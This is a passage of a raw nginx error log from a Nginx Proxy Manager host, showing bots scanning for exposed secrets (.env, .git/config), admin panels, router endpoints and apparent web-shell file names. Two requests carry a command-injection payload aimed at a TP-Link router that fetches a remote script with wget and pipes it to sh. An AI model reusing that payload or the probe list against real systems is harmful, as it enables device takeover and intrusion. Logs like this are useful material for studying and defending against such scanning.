directory), client: 167.86.80.125, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 21:21:42 [error] 446#446: *317327 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 22:07:14 [error] 208#208: *1553 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 22:49:45 [error] 207#207: *3142 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 167.94.138.184, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/19 23:09:39 [error] 207#207: *3163 open() "/var/www/html/frontend/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /frontend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 23:46:42 [error] 251#251: *3494 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 00:49:18 [error] 252#252: *4662 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 00:51:55 [error] 252#252: *4665 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 20.163.15.93, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "91.82.83.208" +2026/01/20 01:00:01 [error] 252#252: *4688 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 91.232.238.112, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.83.208" +2026/01/20 01:02:41 [error] 249#249: *4697 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 01:20:19 [error] 249#249: *4710 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 02:27:04 [error] 252#252: *6322 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 02:42:31 [error] 249#249: *6340 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 03:53:10 [error] 258#258: *8196 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 04:28:27 [error] 256#256: *8224 open() "/var/www/html/login" failed (2: No such file or directory), client: 103.252.89.75, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/20 04:48:43 [error] 258#258: *10129 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 05:25:39 [error] 259#259: *10166 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "91.82.83.208" +2026/01/20 05:35:35 [error] 259#259: *10179 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 06:21:24 [error] 259#259: *10229 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 06:31:24 [error] 256#256: *10239 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.197.47, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.83.208" +2026/01/20 06:33:32 [error] 257#257: *11729 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.197.47, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.83.208" +2026/01/20 07:03:59 [error] 258#258: *11905 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 74.235.100.212, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "91.82.83.208" +2026/01/20 07:53:49 [error] 259#259: *11960 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 07:55:58 [error] 259#259: *11961 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 08:42:17 [error] 259#259: *11997 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 09:43:13 [error] 265#265: *12062 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 09:43:13 [error] 263#263: *12064 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 10:15:53 [error] 263#263: *12088 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 10:38:33 [error] 263#263: *12123 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 45.91.64.8, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 10:38:33 [error] 263#263: *12125 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 45.91.64.8, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 11:40:52 [error] 264#264: *12177 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:12:06 [error] 264#264: *12219 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/home.asp" +2026/01/20 12:15:04 [error] 264#264: *12227 open() "/var/www/html/odinhttpcall1768911304" failed (2: No such file or directory), client: 165.22.65.58, server: localhost-nginx-proxy-manager, request: "GET /odinhttpcall1768911304 HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:15:04 [error] 264#264: *12228 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 165.22.65.58, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:15:04 [error] 264#264: *12230 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 165.22.65.58, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:15:04 [error] 264#264: *12231 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 165.22.65.58, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:15:05 [error] 265#265: *12234 open() "/var/www/html/solr/admin/info/system" failed (2: No such file or directory), client: 64.226.81.53, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/info/system HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:15:05 [error] 265#265: *12235 open() "/var/www/html/query" failed (2: No such file or directory), client: 209.38.233.252, server: localhost-nginx-proxy-manager, request: "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:15:05 [error] 265#265: *12236 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 46.101.126.219, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:15:05 [error] 265#265: *12237 open() "/var/www/html/solr/admin/cores" failed (2: No such file or directory), client: 64.226.81.53, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:23:31 [error] 265#265: *12267 open() "/var/www/html/v2/_catalog" failed (2: No such file or directory), client: 165.227.136.251, server: localhost-nginx-proxy-manager, request: "GET /v2/_catalog HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:27:00 [error] 263#263: *13761 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:27:00 [error] 263#263: *13762 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:36:44 [error] 264#264: *13770 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:39:27 [error] 264#264: *13773 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 12:44:15 [error] 264#264: *13781 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 134.122.73.241, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:44:15 [error] 265#265: *13782 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 134.122.73.241, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:44:15 [error] 265#265: *13783 open() "/var/www/html/t4" failed (2: No such file or directory), client: 134.122.73.241, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:44:15 [error] 265#265: *13784 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 134.122.73.241, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:44:16 [error] 263#263: *15272 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 134.122.73.241, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:44:16 [error] 263#263: *15273 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 134.122.73.241, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:44:16 [error] 263#263: *15274 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 134.122.73.241, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:45:07 [error] 263#263: *15281 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 64.227.18.98, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.83.208" +2026/01/20 12:57:09 [error] 263#263: *15296 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:09 [error] 263#263: *15296 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:09 [error] 263#263: *15296 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /zwso.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:09 [error] 263#263: *15296 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:09 [error] 263#263: *15296 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:10 [error] 263#263: *15296 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:10 [error] 263#263: *15296 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /admin.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:10 [error] 263#263: *15296 open() "/var/www/html/randkeyword.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /randkeyword.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:10 [error] 263#263: *15296 open() "/var/www/html/fwe.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /fwe.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:11 [error] 263#263: *15296 open() "/var/www/html/images/m.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /images/m.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:11 [error] 263#263: *15296 open() "/var/www/html/g.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /g.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:11 [error] 263#263: *15296 open() "/var/www/html/tx1.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /tx1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:11 [error] 263#263: *15296 open() "/var/www/html/xv.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /xv.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:12 [error] 263#263: *15296 open() "/var/www/html/x56.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /x56.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:12 [error] 263#263: *15296 open() "/var/www/html/htaccess.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /htaccess.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:12 [error] 263#263: *15296 open() "/var/www/html/readme.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /readme.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:12 [error] 263#263: *15296 open() "/var/www/html/x50.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /x50.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:13 [error] 263#263: *15296 open() "/var/www/html/fv.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /fv.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:13 [error] 263#263: *15296 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /file.php? HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:13 [error] 263#263: *15296 open() "/var/www/html/lsd.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /lsd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:13 [error] 263#263: *15296 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:13 [error] 263#263: *15296 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:14 [error] 263#263: *15296 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:14 [error] 263#263: *15296 open() "/var/www/html/atx.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /atx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:14 [error] 263#263: *15296 open() "/var/www/html/z60.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /z60.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:14 [error] 263#263: *15296 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:15 [error] 263#263: *15296 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:15 [error] 263#263: *15296 open() "/var/www/html/themes.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /themes.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:15 [error] 263#263: *15296 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:15 [error] 263#263: *15296 open() "/var/www/html/wp-admin/network/wp-conflg.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/wp-conflg.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:16 [error] 263#263: *15296 open() "/var/www/html/click.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /click.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:16 [error] 263#263: *15296 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /install.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:16 [error] 263#263: *15296 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:16 [error] 263#263: *15296 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /simple.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:17 [error] 263#263: *15296 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:17 [error] 263#263: *15296 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:17 [error] 263#263: *15296 open() "/var/www/html/wp-includes/images/wp-login.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/images/wp-login.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:17 [error] 263#263: *15296 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:17 [error] 263#263: *15296 open() "/var/www/html/w.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /w.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:18 [error] 263#263: *15296 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:18 [error] 263#263: *15296 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:18 [error] 263#263: *15296 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:18 [error] 263#263: *15296 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:19 [error] 263#263: *15296 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:19 [error] 263#263: *15296 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:19 [error] 263#263: *15296 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:19 [error] 263#263: *15296 open() "/var/www/html/wp-admin/maint/maint.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/maint.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:20 [error] 263#263: *15296 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:20 [error] 263#263: *15296 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:20 [error] 263#263: *15296 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /autoload_classmap.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:20 [error] 263#263: *15296 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /inputs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:21 [error] 263#263: *15296 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:21 [error] 263#263: *15296 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:21 [error] 263#263: *15296 open() "/var/www/html/themes/twentytwentytwo/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /themes/twentytwentytwo/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:21 [error] 263#263: *15296 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:21 [error] 263#263: *15296 open() "/var/www/html/wp-admin/wp-conflg.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/wp-conflg.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:22 [error] 263#263: *15296 open() "/var/www/html/wp-admin/css/wp-conflg.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/wp-conflg.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:22 [error] 263#263: *15296 open() "/var/www/html/manager.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /manager.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:22 [error] 263#263: *15296 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:22 [error] 263#263: *15296 open() "/var/www/html/plugins/Cache/footer.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /plugins/Cache/footer.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:23 [error] 263#263: *15296 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:23 [error] 263#263: *15296 open() "/var/www/html/mail.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /mail.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:23 [error] 263#263: *15296 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:23 [error] 263#263: *15296 open() "/var/www/html/sx.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /sx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:24 [error] 263#263: *15296 open() "/var/www/html/wp-admin/maint/admin.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:24 [error] 263#263: *15296 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:24 [error] 263#263: *15296 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:24 [error] 263#263: *15296 open() "/var/www/html/byp.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /byp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:25 [error] 